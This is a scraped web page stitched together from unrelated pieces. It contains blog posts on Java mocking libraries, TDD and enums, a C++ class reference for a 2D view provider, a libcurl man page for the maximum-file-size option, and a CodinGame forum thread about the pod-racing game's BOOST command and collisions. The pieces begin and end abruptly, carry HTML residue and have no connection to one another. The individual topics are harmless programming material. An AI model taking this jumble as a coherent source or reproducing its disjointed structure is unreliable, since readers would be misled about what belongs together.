Good job on the fix, but this has been known for over 9 months and reported numerous times - in general chat, in french chat, personally to multiple admins in private messages and of course on the forums. I don't know what finally triggered the fix, but it's definitely not just a matter of "chasing" you.
I didn't say nor imply it was. I just think it doesn't hurt.
Sorry again for this being fixed so late.
Can someone please help me with my code? I'm in wood 2 but I cant seem to get it running.
Im programming in python
import sys
import math
# game loop
while True:
x, y, next_checkpoint_x, next_checkpoint_y, next_checkpoint_dist, next_checkpoint_angle = [int(i) for i in input().split()]
opponent_x, opponent_y = [int(i) for i in input().split()]
#distance
if next_checkpoint_dist < 15:
thrust =10
else:
thrust = 100
#angle
if nextCheckpointAngle > 90 or nextCheckpointAngle < -90 then:
thrust -> 0
else:
thrust -> 100
end if
print x y thrust
print(str(next_checkpoint_x) + " " + str(next_checkpoint_y) + "100")
you need to put it as a string
thrust = "BOOST"
Hello, some tips:the distance should be like 1500 instead of 15 ^^ the radius' of the checkpoints themselfs are 600 ^^also you could make the angle where you thrust with 100 a little sharper like 50 and -50one idea is also to turn to the middle of the map like 1k from the checkpoint away already so that you will be able to boost to the next one more efficiently
Crysaac | http://forum.codingame.com/t/coders-strike-back-puzzle-discussion/1833?page=7 | CC-MAIN-2018-30 | en | refinedweb |
The following help documentation for Flex 4 does not appear to be valid when running under AIR (Flex 4.1). Changes to these entries in the style sheet appear to have no effect. Is this a known issue, and/or is there a workaround? I want all of the drag cursors to be mapped to the standard arrow cursor, and want to handle all other feedback via the drag proxy and the drop indicators.
Another (seemingly well known) issue in AIR is that the imageAlpha parameter of DragManager.doDrag() is simply ignored. Previous queries suggest that it was hardcoded to alpha 1.0 (fully opaque), whereas now it seems to be hardcoded to 50 percent. I actually want the previous behavior of fully opaque. Is there a workaround for this issue as well? Most (all?) of the posts on this issue appear to have gone unanswered.
Thanks for any assistance!
From the docs:
The DragManager uses styles to control the display of the different cursors used during the drag and drop operation, such as the move and copy cursors. The cursors are defined as symbols in the Assets.swf file in the flexInstallDir\frameworks\projects\framework\assets directory.
By default, Flex defines the cursor styles as if you had used the following type selector in your application:
<fx:Style> @namespace mx "library://ns.adobe.com/flex/mx"; mx|DragManager { copyCursor: Embed(source="Assets.swf",symbol="mx.skins.cursor.DragCopy"); defaultDragImageSkin: ClassReference("mx.skins.halo.DefaultDragImage"); linkCursor: Embed(source="Assets.swf",symbol="mx.skins.cursor.DragLink"); moveCursor: Embed(source="Assets.swf",symbol="mx.skins.cursor.DragMove"); rejectCursor: Embed(source="Assets.swf",symbol="mx.skins.cursor.DragReject"); } </fx:Style> | https://forums.adobe.com/thread/754792 | CC-MAIN-2018-30 | en | refinedweb |
The day is 09.11.2015 and for all intents and purposes, it seems to be a fairly routine and run of the mill day. But on this inconspicuous day, was the release of SAP Netweaver 7.40 SPS 13. This SPS stack release comprises many new features to the BW platform and is considered a feature release. There has been posts detailing some of the new features and product road map updates, but I find it interesting that not that many people have picked up on or commented on the new feature, Embedded Consolidation.
Previously, it was fairly straight forward. If you wanted to do planning or use the embedded model. You were always limited to only planning, the consolidation model was only available on the BPC standard / Classic which guided your implementation approach, but the reason for my interest and blog post is to draw some attention to this new feature and capability with SAP BW SPS 13, SAP BPC Embedded Consolidation is now possible..
Reference Links –
Having been involved with an implementation of SAP BPC Embedded Model at a large Financial Institution. I have come to appreciate the performance, flexibility and power of the BPC Embedded model. (Please refer to the reference section below to get links to the various posts outlining and detailing the difference between the two model types) . Having the ability of having both a planning and consolidation application that leverage off of the power and performance of PAK, I can say that I am pretty excited about the fact that organizations can now start to harmonize there planning and consolidation environments and leverage off the power of PAK.
I do however believe that customers will have to carefully consider and understand the drivers for deciding which models to use in their implementation. It will require careful consideration especially in light of the technical requirements and skills required for the implementation of the SAP BPC Embedded models.
I do believe that having both embedded models in the same namespace as SAP BW along with the flexibility that the it provides you, is pretty powerful motivation to consider the embedded consolidation model in itself. There is a multitude of scenarios in which having the planning and consolidations cubes in the same multi / composite provider will facilitate reporting and reduce much of the problems of moving data between models. I can remember scenario’s in which having to write tedious script logic to move data between the different models and conversely how incredibly easy it was to see and move data across different models in the embedded model using FOX and as a result of using Multi / Composite providers in the data model design.
In addition, the ability to call SQL in FOX or SQL Exit CR are pretty compelling reasons in itself for choosing the embedded models in solving a lot of the limitations of the classic BPC models. I look forward to seeing more features and functionality being added to the embedded model, along with hearing some of the customer success stories of the new implementations of using the embedded consolidation model.
SAP Support Product Availability Matrix
Reference Links
SAP Notes –
2240919 – Release Note for Netweaver 7.40 SPS13
Thank you for the info Daniel Jacinto
Hi Daniel
Thank You very much for your information and I am very happy for the importance of Consolidation in Embedded version.
< Planning and Consolidation Functions/Features are heart of the BPC irrespective of Versions and Now Embedded is “All in One Solution”>
I am glad that SAP has been recognized Consolidation and brought into Embedded version
Hello Daniel,
Nice information shared. Thanks.
Hi Daniel,
Thank you for the information.
Regards
Great Info Dan.
Cheers
Nikhil
Thank you so much for valuable information. Sorry if it is basic question , how about Equity pickup and Ownership calculation. Are these features part of other SP levels or i am missing something.
Geeta,
Currently in current version of Embedded Consolidation Equity pickup is not supported but I am sure it would come up later sometime.
Regards
Nikhil
Hi Daniel,
It seems I have to upgrade to Embedded version of BPC.
Very good post.
Thanks
Narsi
Nice one Dan.
Hi Daniel,
Just a note, I see this is only due for release 2016 Q2
Cheers,
Andries
Hi Daniel,
thank you for the valuable info. Is someone in the community aware of an official document or website where the consolidation funcionalities of both, embedded and stadard are compared or litsted? Would really appreciate that.
Kind regads,
Boris
Hi Daniel:
Thanks for the Blog and was very helpful.
Have question related to Embedded vs Real-time Consolidation.
1. Can we follow the Note_2243472 to create Embedded Cons model and later will be able to migrate to S/4 Real-time consolidation?.And where can I find the list Infoobject & other object used for S/4 Real-time consolidation.
2.What is the use of Source Infoprovider in the optional section of creating Consolidation model in Embedded?
Regards
Venkatesh | https://blogs.sap.com/2016/02/23/sap-bpc-embedded-consolidation/ | CC-MAIN-2018-43 | en | refinedweb |
Pass onCurrentIndexChanged Event to an object in Page1
Hello everybody,
as explained in "Custom Qlabel show Videocamera on different thread", I made a QtQuick Controls application where a QThread is used for displaying camera frames, so as not to overload the GUI thread. The application has two pages at the moment, and I pass from one to the other with a SwipeView type, contained in main.qml.

Basically I need to stop the QThread handled by the videocamera object in Page1 when I shift to Page2, and I need to restart it vice versa. Unfortunately in main.qml I cannot see the videocamera object, so I don't know how to pass the onCurrentIndexChanged event to videocamera.

Can you enlighten me?
SwipeView {
    id: swipeView
    anchors.fill: parent
    currentIndex: tabBar.currentIndex

    Page1 {
    }

    Page2 {
    }

    onCurrentIndexChanged: // I want to pass the event to the videocamera QtObject contained in Page1, but I don't know how to do it.
}
Thank you.
Do you mean something like this?
SwipeView {
    id: swipeView
    anchors.fill: parent

    Rectangle {
        color: "green"

        QtObject {
            id: videocamera

            signal viewIndexChanged(var newIndex)
            onViewIndexChanged: console.log("signal received with arg: " + newIndex)
        }
    }

    Rectangle {
        color: "blue"
    }

    onCurrentIndexChanged: videocamera.viewIndexChanged(currentIndex)
}
Hello LeLev,
Maybe I've been misunderstood. Below you can find the following files that could help to clarify the situation:
- main.qml is the main QML file that handles the page changing and shows a footer common to all the pages.
- Page1Form.ui.qml is the QML file where only the graphics objects of Page1 are placed.
- Page1.qml is the QML file where only the logic part for Page1 is placed (there is no logic at the moment).
main.qml
ApplicationWindow {
    visible: true
    width: 480
    height: 320

    SwipeView {
        id: swipeView
        anchors.fill: parent
        currentIndex: tabBar.currentIndex
        Page1 { }
        Page2 { }
    }

    footer: TabBar {
        id: tabBar
        width: parent.width
        height: 35
        currentIndex: swipeView.currentIndex
        TabButton {
            text: qsTr("Webcam")
            font.family: "Helvetica"
            font.pointSize: 13
            font.bold: true
        }
        TabButton {
            text: qsTr("Gpio")
            font.family: "Helvetica"
            font.pointSize: 13
            font.bold: true
        }
    }
}
Page1Form.ui.qml
Item {
    id: item1
    width: 480
    height: 320

    Rectangle {
        id: rectangle
        anchors.fill: parent

        RowLayout {
            id: rowLayout
            spacing: 2
            anchors.top: parent.top
            anchors.left: parent.left
            anchors.right: parent.right

            Videocamera {
                id: videocamera
                width: 350
                height: 250
                x: 0
                y: 0
            }
        }
    }
}
The custom object videocamera has been created with c++ code and it's has been registered in main.cpp with the following:
qmlRegisterType<VideoCamera>("VideocameraLib", 1, 0, "Videocamera");
Inside videocamera.cpp there is a QThread. Basically, I need to pass to the C++ code the event that the page has changed. More specifically, when the current page is Page1 I need to start the thread; otherwise I need to stop it.
The problem is that main.qml doesn't see the objects contained in Page1Form.ui.qml, so I cannot pass the event to videocamera.cpp.
On the other side, I could easily pass events from Page1Form.ui.qml to videocamera.cpp, since it's its direct child.
Maybe I need to pass the event to Page1 first, and then pass it to videocamera?
Thank you.
@davidino
Hello everyone,
after some time testing, I found a solution. I have to give an id to each page; after that I can access Page1's children as follows:
Page1 {
    id: pager1
}
Page2 {
    id: pager2
}
onCurrentIndexChanged: pager1.videocamera.pageChanged(currentIndex)
Hope that can be useful to someone, maybe it's easy but for me, as a newbie, it required some time.
You can use the SwipeView.isCurrentItem attached property to query whether the page is the current item in the view. That way, you can create a nice and clean declarative binding to control whether the camera is active. For example:
Item {
    id: page1

    VideoCamera {
        active: page1.SwipeView.isCurrentItem
    }
}
Just notice that the SwipeView attached properties are available on the root items of the pages that are added to the view, not on arbitrary grandchildren inside the pages. That is, the root items of Page1 and Page2, not their children.
Hello @jpnurmi
I tried the method that you suggest but it didn't work: the property active doesn't exist (Videocamera is a QQuickPaintedItem, I don't know if that's the reason), and after naming the Item page1, I haven't got SwipeView; see the screenshot below.
Let me know if you have any suggestions.
Thank you.
I tried the method that you suggest but it didn't work, the property active doesn't exist (Videocamera is a QQuickPaintedItem, don't know if that the reason)
It was more like a pseudo snippet. We don't know the API of your custom VideoCamera type.
The custom object videocamera has been created with c++ code and it's has been registered in main.cpp...
Based on this, I assumed that the API was in your control. What you do currently to start and stop the video camera is not visible in the above snippets, so I just wrote an imaginary example how it could be controlled in a declarative way, with a simple boolean property in your VideoCamera type.
Hello jpnurmi, thank you for your post.
Now I have learned the meaning of Q_PROPERTY for exposing properties of custom C++ types to QML.
I've added the "active" property for Videocamera but, unfortunately, from Page1Form.ui.qml, I cannot see SwipeView.isCurrentItem property contained in main.qml:
import QtQuick 2.7
import QtQuick.Controls 2.0
import QtQuick.Layouts 1.3
import VideocameraLib 1.0

Item {
    id: page1
    width: 480
    height: 320

    Videocamera {
        id: videocamera
        width: 350
        height: 250
        x: 0
        y: 0
        // It doesn't see SwipeView, nor the id swipeView of the item in main.qml
        active: page1.SwipeView.isCurrentItem
    }
}
Am I missing something else?
Thank you. | https://forum.qt.io/topic/87039/pass-oncurrentindexchanged-event-to-an-object-in-page1 | CC-MAIN-2018-43 | en | refinedweb |
Visual Basic is quite easy. It gets a lot of flack for being so easy. It makes learning the concepts of programming very simple. I used to be a programming trainer and used the BASIC language as the first stepping stone into the world of software development, and it has worked. It has worked for me, technically.
Let me tell you the boring story: I finished school back in 1996. By that time, my parents had already started a computer college. Needless to say, things were a lot different then. I didn't want to be involved, honestly. Not having many other qualifications basically forced me into it. A few years on, I decided to venture into programming. I attempted to start with Visual C++.
It was horrible. I struggled. Add to that the fact that the book I used was literally full of errors and I had to find the errata online (with dial-up Internet). If it wasn't for Codeguru, I would have ended up somewhere else.
I persisted, even though I had no idea what I was doing. I bought a book about Visual Basic. The language just made it simple enough for me to understand what I was doing. Only after I fully grasped Visual Basic, I could venture back to Visual C++ and understand it better. The funny part is that now I am employed as a C# developer.
Enough about me. The aim of this article is not to bore you; it is to dig into some of the intricacies of Visual Basic. Today you will learn about Scope, Modules, and Accessibility Modifiers in Visual Basic.
Scope
Scope, in programming terms, refers to the visibility of assets. These assets include variables, arrays, functions, classes, and structures. Visibility in this case means which parts of your program can see or use it.
Essentially, there are four levels of scope in Visual Basic. These are:
- Block scope: Available only within the code block in which it is declared
- Procedure scope: Available to all code within the procedure in which it is declared
- Module scope: Available to all code within the module, class, or structure in which it is declared
- Namespace scope: Available to all code in the namespace in which it is declared
Block Scope
A block is a set of statements enclosed within starting and ending declaration statements, such as the following:
- If and End If
- Select and End Select
- Do and Loop
- While and End While
- For [Each] and Next
- Try and End Try
- With and End With
If you declare a variable within a block, such as the above-mentioned examples, you can use it only within that block. In the following example, the scope of the SubTotal variable is the block between the If and End If statements. Because the variable SubTotal has been declared inside the block, you cannot refer to SubTotal when execution passes out of the block.
If Tax > 15.0 Then
    Dim SubTotal As Decimal
    SubTotal = Tax * SubTotal ' Correct
End If

' Wrong. Will not work because SubTotal is out of scope!
MessageBox.Show(SubTotal.ToString())
Procedure Scope
Procedure scope means that an element declared within a procedure is not available outside that procedure. Only the procedure that contains the declaration can use it. Variables at this level are usually known as local variables.
In the following example, the variable strWelcome declared in the ShowWelcome Sub procedure cannot be accessed in the Main Sub procedure:
Sub Main()
    ShowWelcome()
    Console.WriteLine(strWelcome) ' Will not work!
    Console.WriteLine("Press Enter to continue...")
    Console.ReadLine()
End Sub

Sub ShowWelcome()
    Dim strWelcome = "Hello friend"
    Console.WriteLine(strWelcome)
End Sub
Module Scope
You can declare elements at the Module level by placing the declaration statement outside of any procedure or block but within the module, class, or structure. When you create a variable at module level, the access level you choose determines the scope. More on Access Modifiers later.
Private elements are available to every procedure in that particular module, but not to any code in a different module.
In the following example, all procedures defined in the module can refer to the string variable strWelcome. When the second procedure is called, it displays the contents of the string variable strWelcome in a messagebox.
Private strWelcome As String ' Outside of all procedures

Sub StoreWelcomeGreeting()
    strWelcome = "Welcome to the world of Programming"
End Sub

Sub SayWelcome()
    MessageBox.Show(strWelcome)
End Sub
Namespace Scope
Namespace scope can be thought of as project scope. By declaring an element at module level using either the Friend or Public keyword, it becomes available to all procedures throughout the namespace in which the element is declared. An element available from within a certain namespace also is available from within any namespaces that are nested inside that namespace. Public elements in a class, module, or structure are available to any project that references their project, as well.
If I had changed the declaration of strWelcome (from the previous example) to:
Public strWelcome As String ' Outside of all procedures
strWelcome would have been accessible throughout the entire namespace.
Modules
A module is simply a type whose members are implicitly Shared and scoped to the declaration space of the standard module's containing namespace. This means that the entire Namespace can access items in the Module.
Fully Qualified Names
A fully qualified name is an unambiguous name that specifies which function, object, or variable is being referred to. An object's name is fully qualified when it includes all names in the hierarchic sequence above the given element as well as the name of the given element itself.
Members of a standard module essentially have two fully qualified names:
- one without the standard module name in front, and
- one including the standard module name.
More than one module in a namespace may contain a member with the same name. Unqualified references to it outside of either module are ambiguous. For example:
Namespace Namespace1
    Module Module1
        Sub Sub1()
        End Sub
        Sub Sub2()
        End Sub
    End Module

    Module Module2
        Sub Sub2()
        End Sub
    End Module

    Module Module3
        Sub Main()
            Sub1()                    ' Valid - calls Namespace1.Module1.Sub1
            Namespace1.Sub1()         ' Valid - calls Namespace1.Module1.Sub1
            Sub2()                    ' Not valid - ambiguous
            Namespace1.Sub2()         ' Not valid - ambiguous
            Namespace1.Module2.Sub2() ' Valid - calls Namespace1.Module2.Sub2
        End Sub
    End Module
End Namespace
Differences Between Modules and Classes
The main difference between Modules and Classes is in the way they store data.
There is never more than one copy of a module's data in memory. This means that when one part of your program changes a public object or variable in a module, and another part subsequently reads that variable, it will get the same value. Classes, on the other hand, exist separately for each instance of the class—for each object created from the class.
Another difference is that data in a module has program scope. This means that the data exists for the entire life of your program; however, class data for each instance of a class exists only for the lifetime of the object.
The last difference is that variables declared as Public in a module are visible from absolutely anywhere in the project, whereas Public variables in a class can only be accessed if you have an object variable containing a reference to a particular instance of a class.
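The shared-versus-per-instance distinction above can be illustrated with static versus instance fields - shown here in Java rather than VB, purely as an illustration, since a VB Module member behaves like a Shared (static) field:

```java
// A "module-like" shared field exists once for the whole program,
// while an instance field exists once per object.
class CounterDemo {
    static int sharedCount = 0; // one copy, like a variable in a VB Module
    int instanceCount = 0;      // one copy per object, like a field in a VB Class

    void increment() {
        sharedCount++;
        instanceCount++;
    }
}
```

If two CounterDemo objects each call increment() once, sharedCount ends up at 2 while each object's instanceCount is 1 - mirroring how module data is program-wide while class data lives per instance.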
Accessibility Modifiers
The access level of an object is what code has permission to read it or write to it. This level is determined not only by how you declare the object itself, but also by the access level of the object's container. The keywords that specify access level are called access modifiers. Visual Basic includes five (5) Access Levels, and they are:
- Public
- Protected
- Friend
- Protected Friend
- Private
Public
Public indicates that the objects, functions, and variables can be accessed from code anywhere in the same project, or from outside projects that reference the project, and from any assembly built from the project. The next code segment creates a Public Course Class and accesses it from somewhere else in the project:
Public Class Course
    Public CourseName As String
End Class

Public Class Student
    Public Sub Enroll()
        Dim c As New Course()
        c.CourseName = "Introduction to Programming"
    End Sub
End Class
Protected
Protected indicates that the objects, variables, and functions can be accessed only from within the same class, or from a class derived from this class. A derived class is simply a class that inherits features from another class, which is called the base class.
The following segment shows that if a class is not derived from the base class, it cannot access the base class's Protected members:
Public Class Course
    Protected Duration As Integer
End Class

Public Class ProgrammingCourse
    Inherits Course

    Public Sub ChooseCourseDuration()
        Duration = 12 ' OK
    End Sub
End Class

Public Class WebDesignCourse
    Public Sub ChooseCourseDuration()
        Dim c As New Course()
        c.Duration = 12 ' Inaccessible because of protection level
    End Sub
End Class
Friend
Friend specifies that the objects, functions, and variables can be accessed from within the same assembly, but not from outside the assembly.
Assembly 1
Public Class Course
    Friend Cost As Double
End Class

Public Class GraphicDesignCourse
    Public Sub SetCost()
        Dim c As New Course()
        c.Cost = 5000 ' OK
    End Sub
End Class
Assembly2
Public Class BasicCourse
    Public Sub SetCost()
        Dim c As New Course()
        c.Cost = 4000 ' Cannot access from an external assembly
    End Sub
End Class
Protected Friend
Protected Friend specifies that objects, functions, and variables can be accessed either from derived (inherited) classes or from within the same assembly, or both.
Private
Private indicates that the objects, variables, and functions can be accessed only from within the same module, class, or structure.
Conclusion
Understanding Scope, Modules, and Access Levels is crucial in building any decent application. The sooner you know these, the better.
Portal Federation with WebLogic Portal WRSP: Advanced IPC Techniques
Abstracting WSRP IPC Session Management
For a small project, having the listener manage the session object directly is both an adequate and acceptable solution. In the case of larger projects (where there will be more developers and/or more IPC over WSRP), it is probably going to be advantageous to have a more generic approach. You may have noticed that your backing file is abstract enough that it can be attached to any portlet listening for any event. You can have this same level of abstraction in the way you retrieve the value. To that end, you will build a light-weight handler to get the value from the session on request from the listening portlet, and then remove the value from the session. Such a helper class would look like this:
package article.examples.portal.util.wsrp;

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpSession;

import org.apache.beehive.netui.pageflow.scoping.ScopedServletUtils;

import com.bea.netuix.servlets.controls.portlet.backing.PortletBackingContext;

public class IpcDataHandler {
    public static final String IPC_DATA = ".data";

    public static Object getIpcData(HttpServletRequest request) {
        HttpServletRequest outerRequest = null;
        HttpSession outerSession = null;
        Object ipcDataObj = null;
        PortletBackingContext pbc = null;

        outerRequest = ScopedServletUtils.getOuterRequest(request);
        outerSession = outerRequest.getSession();
        pbc = PortletBackingContext.getPortletBackingContext(request);
        ipcDataObj = outerSession.getAttribute(pbc.getInstanceId() + IPC_DATA);
        if (ipcDataObj != null) {
            outerSession.removeAttribute(pbc.getInstanceId() + IPC_DATA);
        }
        return ipcDataObj;
    }
}
You then can use this helper in portlet B as follows:
Forward forward = null;
IpcDemo1FormBean ipcValue = null;

ipcValue = (IpcDemo1FormBean) IpcDataHandler.getIpcData(getRequest());
if (ipcValue != null) {
    forward = new Forward("success", ipcValue);
} else {
    forward = new Forward("success");
}
return forward;
Look, Ma, No Forms!
There are times when a form submission is not the desired UI design, such as tables of data in portlet A where your listening portlet is only interested in one line or a single value (one example of this would be Yahoo! or Google Finance in a portfolio view). In this case, the Netui tags provide a convenient way to pass these values without a form:
<netui:anchor action="ipcDemoCall2">
   <netui:parameter name="ipcValue" value="..." />
   IPC Link Example 1
</netui:anchor>
The ipcDemoCall2 action in portlet A then puts the value into an event as follows:
import com.bea.netuix.servlets.controls.portlet.backing.PortletBackingContext;

private static final String IPC_VALUE = "ipcValue";

@Jpf.Action(forwards = {
    @Jpf.Forward(name = "success", path = "index.jsp")
})
public Forward ipcDemoCall2() {
    Forward forward = new Forward("success");
    PortletBackingContext context = null;
    HttpServletRequest outerRequest = null;

    outerRequest = ScopedServletUtils.getOuterRequest(getRequest());
    context = PortletBackingContext.getPortletBackingContext(outerRequest);
    context.fireCustomEvent("loadIpcExample2B", getRequest().getParameter(IPC_VALUE));
    return forward;
}
In this case, the value is simply a String rather than an object. Fortunately, you have created your generic helper to not care what kind of object is packed into the payload, so you can continue to pick up the value in the same way you handled it earlier.
Page Switching with WSRP
Earlier, you set up your event listening so that it would not matter whether the listening portlet was displayed or not:
<netuix:handleEvent<< | https://www.developer.com/lang/article.php/10924_3749366_2/Portal-Federation-with-WebLogic-Portal-WRSP-Advanced-IPC-Techniques.htm | CC-MAIN-2018-43 | en | refinedweb |
Can anyone help me? I have been banging my head on this one for two days: "variable number may not have been initialized". The code is supposed to read single-digit numbers and return the largest of ten. The code is as follows.
// Java packages
import javax.swing.JOptionPane;

public class Counter
{
    // main method begins execution of Java application
    public static void main( String args[] )
    {
        // declare variables
        int counter;        // loop counter
        String number;      // number entered by user
        double number2 = 0; // number converted to integer
        double largest = 0; // largest of all numbers entered

        for( counter = 0; counter < 10; counter++ )
            number = JOptionPane.showInputDialog( "Enter a single digit number: ");

        number2 = Double.parseDouble( number );

        if ( number2 > number2)
            largest = number2;

        JOptionPane.showMessageDialog( null, largest + " is the largest");
    }
}
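For what it's worth, three things stand out in the posted code: number is read after the loop without a guaranteed assignment (hence the compiler error), the unbraced for loop repeats only the input dialog line, and the test number2 > number2 compares the value against itself instead of against largest. A minimal corrected sketch (with a hard-coded input array standing in for the ten JOptionPane dialogs so it runs headless; the class and method names here are just illustrative):

```java
// Corrected sketch: collect the values, then scan for the largest,
// comparing each value against the running maximum (not against itself).
public class Largest
{
    // Returns the largest value in the given array.
    static double largestOf(double[] numbers)
    {
        double largest = numbers[0];
        for (int counter = 1; counter < numbers.length; counter++)
        {
            if (numbers[counter] > largest) // the original compared number2 > number2
                largest = numbers[counter];
        }
        return largest;
    }

    public static void main(String[] args)
    {
        // Hard-coded stand-in for the ten dialog inputs.
        double[] input = { 3, 7, 2, 9, 1, 5, 8, 4, 6, 0 };
        System.out.println(largestOf(input) + " is the largest");
    }
}
```

In the original structure, the fix amounts to bracing the loop body so the parse and comparison happen for every input, and initializing largest from the first value read.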
Visual Studio 2015 Preview was recently released along with .NET 4.6 and contains many new and exciting features like support for cross platform development in C++, an open-source .NET compiler platform, Cordova Tooling, ASP.NET 5, IDE enhancements for Web development and much more. You can download Visual Studio 2015 Preview from the following link -
In this article, we will be looking at some Debugging enhancements done in Visual Studio 2015, while comparing the same with Visual Studio 2013. We will also look at few new introductions in debugging the C# and VB.NET languages as well.
Let’s get started by creating a blank solution in Visual Studio 2013 as well as Visual Studio 2015, and then do the comparison between these two by writing a couple of programs.
Step 1: Create a blank solution with the name VisualStudio2013DebugDemo and VisualStudio2015DebugDemo under Visual Studio 2013 and Visual Studio 2015 respectively.
Step 2: Add a class library with the name SalesLibrary in both the Visual Studio solutions and rename the class name as SalesCalculation.
Step 3: Add a SalesNetProfit function under both the Class Libraries available in VS 2013 and VS 2015. Write the following code in SalesNetProfit:
public class SalesCalculation
{
public double SalesNetProfit(double COGS, double Expenses, double ActualSales)
{
return ActualSales - (COGS + Expenses);
}
}
Step 4: Now use this SalesLibrary into a Console Application. Add a Console application under both Visual Studio with the name “SalesCalculatorUI” and add a reference to the SalesLibrary in SalesCalculatorUI. Your solution should look like the following:
Step 5: Now consume this SalesLibrary and call a SalesNetProfit function in our console application. Repeat this code in both VS 2013 and 2015. The code is shown here:
static void Main(string[] args)
{
SalesLibrary.SalesCalculation calci = new SalesLibrary.SalesCalculation();
double netProfit = calci.SalesNetProfit(2000, 4000, 16000);
Console.WriteLine("Sales Net Profit is - $ {0}", netProfit);
Console.ReadKey();
}
Step 6: Add a breakpoint on the SalesNetProfit function in the class library under Visual Studio 2013 as well as Visual Studio 2015 and observe the breakpoint:
In Visual Studio 2015, Microsoft has added a better experience for setting additional information about breakpoints, with a shortcut to Settings and Disable Breakpoint as shown above. If you want this functionality in Visual Studio 2013, you will have to right-click and disable the breakpoint or go to settings using the context menu. Let's observe the context menu for both VS 2013 and 2015. It is shown below:
If you observe the context menu in both VS 2013 and VS 2015, you will find a cleaner and better experience with the latter, as the Condition, Hit Count and other options are now moved to the Settings menu item in VS 2015. Let's click on Settings in the VS 2015 context menu. A separate window called Breakpoint Settings appears which allows you to set the Conditions and Actions as shown here:
Check the Conditions check box, which will allow you to set the conditions for your breakpoint. For example, I want to hit the breakpoint if my actual sales are below $1000. Look at the Conditions options as shown here:
You can see that you can now set conditions for the breakpoint. You can set Hit Count to execute the breakpoint and you can apply the filters in a nice, easy-to-use interface.
In Conditions, you can set multiple conditions as per your requirements, with the option to edit the code by keeping the Breakpoint settings option on.
You will also find some useful intellisense in the expression window as shown here:
I have set a couple of conditions in my Conditions section which you can find by downloading the source code (look at the bottom of this article). Run the code and observe the breakpoints by changing the values we are passing to our function and making the sales net profit less than 1000.
You can also add actions when the breakpoint is executed. For example, printing the values in the Output window could be the best way to watch values. The values which you want to print from the program must be enclosed in {} curly brackets. In our example, we have used {netProfit} as shown here:
The output of this action can be viewed in the Output Window:
Please note that these are not new options. These were there in the previous versions of Visual Studio. But with Visual Studio 2015, the accessibility of these features has become much simpler.
Step 7: Now let’s add a LINQ-To-SQL class in Visual Studio 2015 in SalesLibrary and write a function that will return some data from the Northwind database. I already have SQL Server 2012 installed and Northwind database preconfigured on my machine. If you don’t have that setup, install it before moving ahead.
Now drag and drop a couple of tables from the Northwind database using Server Explorer.
Step 8: Let’s add a function which will fetch the customers and their orders in our SalesCalculation library. The code is as shown here:
NorthwindDataContext dataContext = new NorthwindDataContext();
public List<Customer> FetchCustomer()
{
var customers = dataContext.Customers.ToList();
return customers;
}
In the above code, we are returning customers from the Customers table of the Northwind database. Now if you would like to debug this code and add some conditions or assumptions, you will have to first change the code and then run it to observe the changes.
In Visual Studio 2015, while debugging the code, we can now write queries [LINQ query/lambda expression] targeting the data in the Immediate Window or Watch Window. Yes, you can debug lambda expressions too! Let's try some of them.
Let’s add a breakpoint on the return statement and execute the code by calling the function in our main method of the console application. When the breakpoint is hit, open the Watch window if it’s not already opened and write the LINQ query to see the result. The output is as shown here:
Now if you perform the same operation in Visual Studio 2013, you will see the following output:
This is a cool new feature introduced for C# and VB.NET developers which allows us to now write queries and test the output or perform some assumptions during debugging of our programs.
Now let’s see the same query in the Immediate Window. Run the program and when the breakpoint is hit, open Immediate Window and write the following code and see the results:
So with these enhanced debugging features introduced in Visual Studio 2015, the different options during debugging, and querying the data, are now readily accessible in ways that were not so easy, or even possible, in Visual Studio 2013. In the end, these new features make a developer's life much simpler.
We will explore some more features in our forthcoming articles. Stay tuned!
Download the entire source code of this article (Github) | https://www.dotnetcurry.com/visualstudio/1059/debugging-visual-studio-2015 | CC-MAIN-2018-43 | en | refinedweb |
Create entity placeholder objects in a HAM
#include <ha/ham.h>

ham_entity_t *ham_entity( const char *ename,
                          int nd,
                          unsigned flags );

ham_entity_t *ham_entity_node( const char *ename,
                               const char *nodename,
                               unsigned flags );
Library: libham
These functions are used to create placeholders for entity objects in a HAM. The ham_entity_node() function is used when a nodename is used to specify a remote HAM instead of a node identifier (nd).
You can use these functions to create entities, and associate conditions and actions with them, before the process associated with an entity is started (or attached). Subsequent ham_attach*() calls by entities can attach to these placeholder and thereby enable conditions and actions when they occur.
The nd variable specifies the node identifier of the remote node at the time the call is made.
The ham_entity_node() function takes as a parameter a fully qualified node name (FQNN).
Returns: An entity handle, or NULL if an error occurred (errno is set).
In addition to the above errors, the HAM returns any error it encounters while servicing this request. | http://www.qnx.com/developers/docs/6.6.0_anm11_wf10/com.qnx.doc.ham/topic/hamapi/ham_entity.html | CC-MAIN-2018-43 | en | refinedweb |
DataBinding
Databinding for the RadDataBar control involves the correlation between the business logic/data and the visualization of the control.
The DataBinding involves the following three properties:
ItemsSource (a property of RadStackedDataBar and RadStacked100Databar): Gets or sets the data source used to generate the content of the databar control. Elements can be bound to data from a variety of data sources in the form of common language runtime (CLR) objects and XML - see the list of the supported data sources below.
Value (a property of RadDataBar): Expects a value which will be used to determine the size of the bar.
ValuePath (a property of RadStackedDataBar and RadStacked100DataBar): Expects the name of the property from the underlying datasource, which will determine the value of each bar in the stack.
You can bind the ItemsSource of RadStackedDataBar and RadStacked100DataBar to any class that implements the IEnumerable interface.
RadDataBar will automatically update its size if the value it is bound to changes. For this to happen the underlying data context must implement the INotifyPropertyChanged interface.
RadStackedDataBar and RadStacked100DataBar also provide full support for change notifications - data sources that implement the INotifyCollectionChanged, and underlying data items that implement INotifyPropertyChanged are properly tracked and automatically reflected by the UI.
You'll see the binding in action below.
Let's create a sample class with four properties - two integers, a collection of integers and a collection of another class.
Example 1: The Product class
public class Product
{
    public int Value1 { get; set; }
    public int Value2 { get; set; }
    public IEnumerable<int> Ints { get; set; }
    public IEnumerable<Item> Items { get; set; }
}

public class Item
{
    public double Val { get; set; }
    public string Name { get; set; }
}
Public Class Product
    Public Property Value1() As Integer
    Public Property Value2() As Integer
    Public Property Ints() As IEnumerable(Of Integer)
    Public Property Items() As IEnumerable(Of Item)
End Class

Public Class Item
    Public Property Val() As Double
    Public Property Name() As String
End Class
The next step is to set values for the properties in our class.
Example 2: Sample data
var items = new List<Item>()
{
    new Item { Val = 9, Name = "nine" },
    new Item { Val = 10, Name = "ten" },
    new Item { Val = 11, Name = "eleven" },
    new Item { Val = 20, Name = "twenty" },
    new Item { Val = 22, Name = "twenty two" },
    new Item { Val = 90, Name = "ninety" },
    new Item { Val = -9, Name = "-nine" },
    new Item { Val = -10, Name = "-ten" },
